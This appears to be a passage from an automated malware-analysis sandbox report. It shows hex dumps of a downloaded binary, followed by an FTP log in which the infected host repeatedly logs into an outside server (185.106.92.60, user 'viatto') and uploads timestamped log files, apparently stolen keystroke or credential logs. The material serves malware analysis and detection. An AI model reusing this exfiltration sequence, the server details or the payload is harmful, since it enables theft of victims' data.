                                                                                                                                    2022-10-10 04:02:14 UTC35INData Raw: d3 83 c8 ff 5f 5e 5d 5b c3 2b f3 d1 fe 8b c6 eb f3 53 55 56 57 8b 7c 24 1c 8b d9 3b fa 77 4c 8b 4c 24 14 8b f2 2b f7 3b ce 77 40 85 ff 75 04 8b c1 eb 3b 8b eb 03 cb 2b ef 03 ea 8d 55 01 2b d1 eb 19 8b 54 24 18 8b ce 57 e8 41 cb ff ff 59 85 c0 74 20 46 8d 55 01 2b d6 8b ce ff 74 24 18 e8 15 e2 ff ff 8b f0 59 85 f6 75 d7 83 c8 ff 5f 5e 5d 5b c3 2b f3 8b c6 eb f5 51 51 53 55 56 8b f1 89 74 24 10 e8 14 9d ff ff 8b d8 8b 6b 10 e8 d4 a3 ff ff 8b 4c 24 18 2b c5 3b c1 0f 82 97 00 00 00 8b 43 14 57 8d 3c 29 89 44 24 10 57 8b ce e8 3a ac ff ff 8b f0 8d 4e 01 51 e8 9a a4 ff ff 89 44 24 1c 89 7b 10 89 73 14 8b 4c 24 1c e8 26 85 ff ff ff 74 24 30 8b 7c 24 14 8b d0 ff 74 24 30 ff 74 24 30 ff 74 24 30 55 83 ff 08 72 22 8b 33 8b ce e8 01 85 ff ff 50 52 e8 59 f7 ff ff 8d
                                                                                                                                    Data Ascii: _^][+SUVW|$;wLL$+;w@u;+U+T$WAYt FU+t$Yu_^][+QQSUVt$kL$+;CW<)D$W:NQD${sL$&t$0|$t$0t$0t$0Ur"3PRY
                                                                                                                                    2022-10-10 04:02:14 UTC51INData Raw: 08 50 ff 36 e8 ee e8 ff ff 59 59 89 06 eb 41 39 5f 18 75 26 8b 48 18 85 c9 74 5b 85 f6 74 57 ff 77 14 8d 47 08 50 51 e8 cb e8 ff ff 59 59 50 56 e8 fb dc ff ff 83 c4 0c eb 16 39 58 18 74 37 85 f6 74 33 f6 07 04 6a 00 5b 0f 95 c3 43 89 5d e0 c7 45 fc fe ff ff ff 8b c3 eb 0b 33 c0 40 c3 8b 65 e8 eb 12 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 e8 2d 6d 00 00 cc 6a 08 68 f8 bd 42 00 e8 18 d6 ff ff 8b 55 10 8b 4d 0c 83 3a 00 7d 04 8b f9 eb 06 8d 79 0c 03 7a 08 83 65 fc 00 8b 75 14 56 52 51 8b 5d 08 53 e8 8d fe ff ff 83 c4 10 83 e8 01 74 21 83 e8 01 75 34 6a 01 8d 46 08 50 ff 73 18 e8 2c e8 ff ff 59 59 50 ff 76 18 57 e8 31 0b 00 00 eb 18 8d 46 08 50 ff 73 18 e8 12 e8 ff ff 59 59 50 ff 76 18 57 e8 07 0b 00 00 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00
                                                                                                                                    Data Ascii: P6YYA9_u&Ht[tWwGPQYYPV9Xt7t3j[C]E3@e3MdY_^[-mjhBUM:}yzeuVRQ]St!u4jFPs,YYPvW1FPsYYPvWEMd
                                                                                                                                    2022-10-10 04:02:14 UTC67INData Raw: 8b 0e 83 26 00 8d 04 47 89 4d f8 89 45 fc 3b f8 74 34 8b 45 10 50 0f b7 07 8b cb 50 e8 e0 fc ff ff 8b 45 10 83 38 ff 75 12 83 3e 2a 75 15 50 6a 3f 8b cb e8 c9 fc ff ff 8b 45 10 83 c7 02 3b 7d fc 75 d2 8b 4d f8 83 3e 00 75 06 85 c9 74 02 89 0e 5f 5e 5b 8b e5 5d c2 10 00 8b ff 55 8b ec 51 51 53 8b 5d 14 8b c1 57 89 45 f8 8b 0b 83 23 00 8b 10 89 4d fc 8b 7a 04 39 7a 08 75 18 80 7a 0c 00 74 0a 8b 4d 10 8b 45 0c 01 01 eb 51 8b 45 10 83 08 ff eb 4c 2b 7a 08 8b 45 0c 3b f8 72 02 8b f8 56 8d 34 3f 56 ff 75 08 ff 32 e8 00 a2 ff ff 8b 4d f8 83 c4 0c 8b 01 01 30 8b 01 5e 01 78 08 8b 01 80 78 0c 00 8b 45 10 74 07 8b 4d 0c 01 08 eb 0c 3b 7d 0c 74 05 83 08 ff eb 02 01 38 8b 4d fc 83 3b 00 75 06 85 c9 74 02 89 0b 5f 5b 8b e5 5d c2 10 00 8b ff 55 8b ec 83 ec 2c 8b 45 1c
                                                                                                                                    Data Ascii: &GME;t4EPPE8u>*uPj?E;}uM>ut_^[]UQQS]WE#Mz9zuztMEQEL+zE;rV4?Vu2M0^xxEtM;}t8M;ut_[]U,E
                                                                                                                                    2022-10-10 04:02:14 UTC83INData Raw: 75 0c 8b ce ff 75 08 ff 15 8c 42 42 00 ff d6 eb 09 ff 75 08 e8 13 6b 00 00 59 8b 4d fc 33 cd 5e e8 56 54 ff ff 8b e5 5d c2 08 00 a1 0c e0 42 00 57 6a 20 83 e0 1f bf a0 f0 42 00 59 2b c8 33 c0 d3 c8 33 05 0c e0 42 00 6a 20 59 f3 ab b0 01 5f c3 8b ff 55 8b ec 51 51 a1 0c e0 42 00 33 c5 89 45 fc 8b 0d 20 f1 42 00 85 c9 74 0a 33 c0 83 f9 01 0f 94 c0 eb 54 56 68 30 63 42 00 68 28 63 42 00 68 30 63 42 00 6a 08 e8 dc f9 ff ff 8b f0 83 c4 10 85 f6 74 27 83 65 f8 00 8d 45 f8 6a 00 50 8b ce ff 15 8c 42 42 00 ff d6 83 f8 7a 75 0e 33 c9 ba 20 f1 42 00 41 87 0a b0 01 eb 0c 6a 02 58 b9 20 f1 42 00 87 01 32 c0 5e 8b 4d fc 33 cd e8 a7 53 ff ff 8b e5 5d c3 8b ff 55 8b ec 80 7d 08 00 75 27 56 be 50 f0 42 00 83 3e 00 74 10 83 3e ff 74 08 ff 36 ff 15 d4 41 42 00 83 26 00 83
                                                                                                                                    Data Ascii: uuBBukYM3^VT]BWj BY+33Bj Y_UQQB3E Bt3TVh0cBh(cBh0cBjt'eEjPBBzu3 BAjX B2^M3S]U}u'VPB>t>t6AB&
                                                                                                                                    2022-10-10 04:02:14 UTC99INData Raw: 55 8b ec 8b 45 0c 3b 45 08 76 05 83 c8 ff 5d c3 1b c0 f7 d8 5d c3 8b ff 55 8b ec 8b 45 0c 83 ec 20 56 85 c0 75 16 e8 a6 b0 ff ff 6a 16 5e 89 30 e8 84 84 ff ff 8b c6 e9 58 01 00 00 8b 75 08 33 c9 53 57 89 08 8b f9 8b d9 89 7d e0 89 5d e4 89 4d e8 39 0e 74 56 8d 45 fc 66 c7 45 fc 2a 3f 50 ff 36 88 4d fe e8 16 6b 00 00 59 59 85 c0 75 14 8d 45 e0 50 6a 00 6a 00 ff 36 e8 27 01 00 00 83 c4 10 eb 0f 8d 4d e0 51 50 ff 36 e8 ac 01 00 00 83 c4 0c 8b f8 85 ff 0f 85 eb 00 00 00 83 c6 04 33 c9 39 0e 75 b0 8b 5d e4 8b 7d e0 83 65 f8 00 8b c3 2b c7 89 4d fc 8b d0 83 c0 03 c1 fa 02 42 c1 e8 02 3b df 89 55 f4 1b f6 f7 d6 23 f0 74 30 8b d7 8b d9 8b 0a 8d 41 01 89 45 fc 8a 01 41 84 c0 75 f9 2b 4d fc 43 8b 45 f8 03 d9 83 c2 04 40 89 45 f8 3b c6 75 dd 8b 55 f4 89 5d fc 8b 5d
                                                                                                                                    Data Ascii: UE;Ev]]UE Vuj^0Xu3SW}]M9tVEfE*?P6MkYYuEPjj6'MQP639u]}e+MB;U#t0AEAu+MCE@E;uU]]
                                                                                                                                    2022-10-10 04:02:14 UTC115INData Raw: e8 32 cc ff ff 83 c4 10 83 a5 94 fa ff ff 00 33 c0 40 89 b5 90 fa ff ff 89 85 8c fa ff ff 89 85 5c fc ff ff 6a 04 e9 19 fe ff ff 81 fe 02 fc ff ff 0f 84 19 01 00 00 83 a5 90 fa ff ff 00 6a 02 59 c7 85 94 fa ff ff 00 00 10 00 89 8d 8c fa ff ff 3b d9 0f 85 f7 00 00 00 33 d2 8b 84 15 90 fa ff ff 3b 84 15 30 fe ff ff 0f 85 e1 00 00 00 83 c2 04 83 fa 08 75 e4 83 a5 9c f8 ff ff 00 0f bd c7 74 05 8d 50 01 eb 02 33 d2 6a 20 58 2b c2 8b f1 3b c1 8d 85 38 fe ff ff 89 85 ac f8 ff ff 8b f8 0f 92 85 bb f8 ff ff 3b f3 73 0a 8b 17 89 95 b0 f8 ff ff eb 07 83 a5 b0 f8 ff ff 00 8d 46 ff 3b c3 73 05 8b 57 fc eb 02 33 d2 8b 85 b0 f8 ff ff 83 ef 04 c1 e0 02 c1 ea 1e 33 d0 8b 85 ac f8 ff ff 4e 89 10 83 e8 04 89 85 ac f8 ff ff 83 fe ff 74 08 8b 9d 2c fe ff ff eb ad 33 c0 38 85
                                                                                                                                    Data Ascii: 23@\jjY;3;0utP3j X+;8;sF;sW33Nt,38
                                                                                                                                    2022-10-10 04:02:14 UTC131INData Raw: e9 42 00 83 f8 ff 74 0c 83 f8 fe 74 07 50 ff 15 24 41 42 00 c3 8b ff 55 8b ec 8b 55 08 33 c9 f7 c2 80 7e 00 00 74 67 84 d2 79 03 6a 10 59 57 bf 00 02 00 00 85 d7 74 03 83 c9 08 f7 c2 00 04 00 00 74 03 83 c9 04 f7 c2 00 08 00 00 74 03 83 c9 02 f7 c2 00 10 00 00 74 03 83 c9 01 56 be 00 60 00 00 8b c2 23 c6 3b c6 5e 75 08 81 c9 00 03 00 00 eb 1a f7 c2 00 40 00 00 74 08 81 c9 00 01 00 00 eb 0a f7 c2 00 20 00 00 74 02 0b cf 5f 8b c1 5d c3 8b ff 55 8b ec 8b 55 08 33 c9 f7 c2 3d 0c 00 00 74 5d f6 c2 01 74 03 6a 10 59 f6 c2 04 74 03 83 c9 08 f6 c2 08 74 03 83 c9 04 f6 c2 10 74 03 83 c9 02 f6 c2 20 74 03 83 c9 01 56 be 00 0c 00 00 8b c2 23 c6 3b c6 5e 75 08 81 c9 00 03 00 00 eb 1e f7 c2 00 08 00 00 74 08 81 c9 00 01 00 00 eb 0e f7 c2 00 04 00 00 74 06 81 c9 00 02
                                                                                                                                    Data Ascii: BttP$ABUU3~tgyjYWttttV`#;^u@t t_]UU3=t]tjYttt tV#;^utt
                                                                                                                                    2022-10-10 04:02:14 UTC147INData Raw: 14 00 10 00 12 01 10 00 10 00 10 00 14 00 12 01 10 00 10 00 10 00 10 00 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    2022-10-10 04:02:14 UTC163INData Raw: 00 00 00 00 6c 6f 67 00 6c 6f 67 31 30 00 00 00 65 78 70 00 70 6f 77 00 61 73 69 6e 00 00 00 00 61 63 6f 73 00 00 00 00 73 71 72 74 00 00 00 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 0a a8 03 7c 3f 1b f7 51 2d 38 05 3e 3d 00 00 de b6 9d 57 8b 3f 05 30 fb fe 09 6b 38 3d 00 80 96 de ae 70 94 3f 1d e1 91 0c 78 fc 39 3d 00 00 3e 8e 2e da 9a 3f 1a 70 6e 9e d1 1b 35 3d 00 c0 59 f7 d8 ad a0 3f a1 00 00 09 51 2a 1b 3d 00 00 63 c6 f7 fa a3 3f 3f f5 81 f1 62 36 08 3d 00 c0 ef 59 1e 17 a7 3f db 54 cf 3f 1a bd 16 3d 00 00 c7 02 90 3e aa 3f 86 d3 d0 c8 57 d2 21 3d 00 40 c3 2d 33 32 ad 3f 1f 44 d9 f8 db 7a 1b 3d 00 a0 d6 70 11 28 b0 3f 76 50 af 28 8b f3 1b 3d 00 60 f1 ec 1f 9c b1 3f d4 55 53 1e 3f e0 3e
                                                                                                                                    Data Ascii: loglog10exppowasinacossqrt?|?Q-8>=W?0k8=p?x9=>.?pn5=Y?Q*=c??b6=Y?T?=>?W!=@-32?Dz=p(?vP(=`?US?>
                                                                                                                                    2022-10-10 04:02:14 UTC179INData Raw: 00 00 00 80 ff ff ff ff b1 19 bf 44 4e e6 40 bb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 20 05 93 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 20 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii: DN@


                                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                    Oct 10, 2022 06:02:16.547602892 CEST2149707185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:16.547792912 CEST2149707185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:16.547837019 CEST2149707185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:16.549509048 CEST4970721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:16.601772070 CEST2149707185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:16.603007078 CEST4970721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:16.626245022 CEST2149707185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:16.626522064 CEST4970721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:16.649837971 CEST2149707185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:16.650156021 CEST4970721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:16.674181938 CEST2149707185.106.92.60192.168.2.3257 "/138727-user" created successfully
                                                                                                                                    Oct 10, 2022 06:02:16.706060886 CEST4970721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:16.729320049 CEST2149707185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:16.743102074 CEST4970721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:16.766612053 CEST2149707185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,251,252)
                                                                                                                                    Oct 10, 2022 06:02:16.791115046 CEST4970721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.03.txt
                                                                                                                                    Oct 10, 2022 06:02:16.814868927 CEST2149707185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:16.845556974 CEST2149707185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:17.061036110 CEST2149709185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:17.061089993 CEST2149709185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:17.061121941 CEST2149709185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:17.063640118 CEST4970921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:17.089420080 CEST2149709185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:17.090101957 CEST4970921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:17.114562988 CEST2149709185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:17.114844084 CEST4970921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:17.139050961 CEST2149709185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:17.140444040 CEST4970921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:17.165857077 CEST2149709185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:17.185683012 CEST4970921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:17.211286068 CEST2149709185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:17.213219881 CEST4970921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:17.238339901 CEST2149709185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,251,253)
                                                                                                                                    Oct 10, 2022 06:02:17.267815113 CEST4970921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.04.txt
                                                                                                                                    Oct 10, 2022 06:02:17.294861078 CEST2149709185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:17.325059891 CEST2149709185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:17.526211023 CEST2149711185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:17.526261091 CEST2149711185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:17.526438951 CEST2149711185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:17.526634932 CEST4971121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:17.549772024 CEST2149711185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:17.563448906 CEST4971121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:17.587174892 CEST2149711185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:17.591079950 CEST4971121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:17.614484072 CEST2149711185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:17.652906895 CEST4971121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:17.676831007 CEST2149711185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:17.688455105 CEST4971121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:17.711927891 CEST2149711185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:17.721153975 CEST4971121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:17.745646000 CEST2149711185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,251,254)
                                                                                                                                    Oct 10, 2022 06:02:17.772227049 CEST4971121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.05.txt
                                                                                                                                    Oct 10, 2022 06:02:17.797667980 CEST2149711185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:17.849138975 CEST2149711185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:18.070177078 CEST2149713185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:18.070230961 CEST2149713185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:18.070262909 CEST2149713185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:18.070704937 CEST4971321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:18.094813108 CEST2149713185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:18.104820967 CEST4971321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:18.129371881 CEST2149713185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:18.131010056 CEST4971321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:18.155194044 CEST2149713185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:18.159121037 CEST4971321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:18.184561014 CEST2149713185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:18.185234070 CEST4971321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:18.209089994 CEST2149713185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:18.210804939 CEST4971321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:18.235384941 CEST2149713185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,251,255)
                                                                                                                                    Oct 10, 2022 06:02:18.261656046 CEST4971321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.06.txt
                                                                                                                                    Oct 10, 2022 06:02:18.286534071 CEST2149713185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:18.314013958 CEST2149713185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:18.555632114 CEST2149715185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:18.555727959 CEST2149715185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:18.555768013 CEST2149715185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:18.556879044 CEST4971521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:18.582302094 CEST2149715185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:18.582648993 CEST4971521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:18.608556032 CEST2149715185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:18.608913898 CEST4971521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:18.635397911 CEST2149715185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:18.647905111 CEST4971521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:18.673578978 CEST2149715185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:18.674190044 CEST4971521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:18.702738047 CEST2149715185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:18.704272032 CEST4971521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:18.729336977 CEST2149715185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,1)
                                                                                                                                    Oct 10, 2022 06:02:18.764116049 CEST4971521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.07.txt
                                                                                                                                    Oct 10, 2022 06:02:18.790297985 CEST2149715185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:18.816879988 CEST2149715185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:19.048643112 CEST2149717185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:19.053272009 CEST2149717185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:19.053366899 CEST2149717185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:19.053611994 CEST4971721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:19.076395035 CEST2149717185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:19.076742887 CEST4971721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:19.100287914 CEST2149717185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:19.100560904 CEST4971721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:19.123522997 CEST2149717185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:19.125360012 CEST4971721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:19.148967981 CEST2149717185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:19.150396109 CEST4971721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:19.173559904 CEST2149717185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:19.191740036 CEST4971721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:19.214903116 CEST2149717185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,2)
                                                                                                                                    Oct 10, 2022 06:02:19.238585949 CEST4971721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.08.txt
                                                                                                                                    Oct 10, 2022 06:02:19.262015104 CEST2149717185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:19.286194086 CEST2149717185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:19.481750011 CEST2149719185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:19.481826067 CEST2149719185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:19.482281923 CEST2149719185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:19.482434988 CEST4971921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:19.507076979 CEST2149719185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:19.516647100 CEST4971921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:19.541484118 CEST2149719185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:19.541740894 CEST4971921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:19.565243959 CEST2149719185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:19.565682888 CEST4971921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:19.589823961 CEST2149719185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:19.590491056 CEST4971921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:19.615129948 CEST2149719185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:19.626633883 CEST4971921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:19.652019024 CEST2149719185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,3)
                                                                                                                                    Oct 10, 2022 06:02:19.676268101 CEST4971921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.09.txt
                                                                                                                                    Oct 10, 2022 06:02:19.788305998 CEST2149719185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:19.812458992 CEST2149719185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:20.067169905 CEST2149721185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:20.067783117 CEST2149721185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:20.067816973 CEST2149721185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
